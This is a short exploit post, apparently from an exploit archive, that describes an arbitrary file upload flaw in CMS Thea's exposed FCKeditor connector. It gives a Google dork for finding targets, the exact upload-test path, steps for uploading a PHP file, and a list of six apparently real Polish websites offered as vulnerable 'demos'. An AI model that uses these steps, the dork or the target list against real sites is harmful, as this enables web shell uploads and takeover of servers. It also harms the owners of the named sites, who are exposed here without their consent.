[+] CMS Thea (fckeditor) Arbitrary File Upload Vulnerability
[+] Exploit Title : CMS Thea (FCKEDITOR)
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://cpu-zeto.pl
[+] Google Dork : Designed by C.P.U. ZETO w Jeleniej Górze
[+] Date: 2015-04-23
[+] Tested On : Windows 7 / Mozilla Firefox
[+] Version : All Version
[+] exploit => js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] first go to => http://site.com/[path]
[+] then => http://www.site.com/[path]/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
[+] demos :
[+] http://getagilitXy.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://techmur.Xpl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://skzhoryXzont.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://polarniXk.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://jarex-Xtrans.com.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+] http://koralXowasciezka.pl/js/fckeditor/editor/filemanager/connectors/uploadtest.html
[+][+][+][+][+][+][+][+][+][+][+]
[+]Discovered By : Cyb3r_Dr4in[+]
[+][+][+][+][+][+][+][+][+][+][+]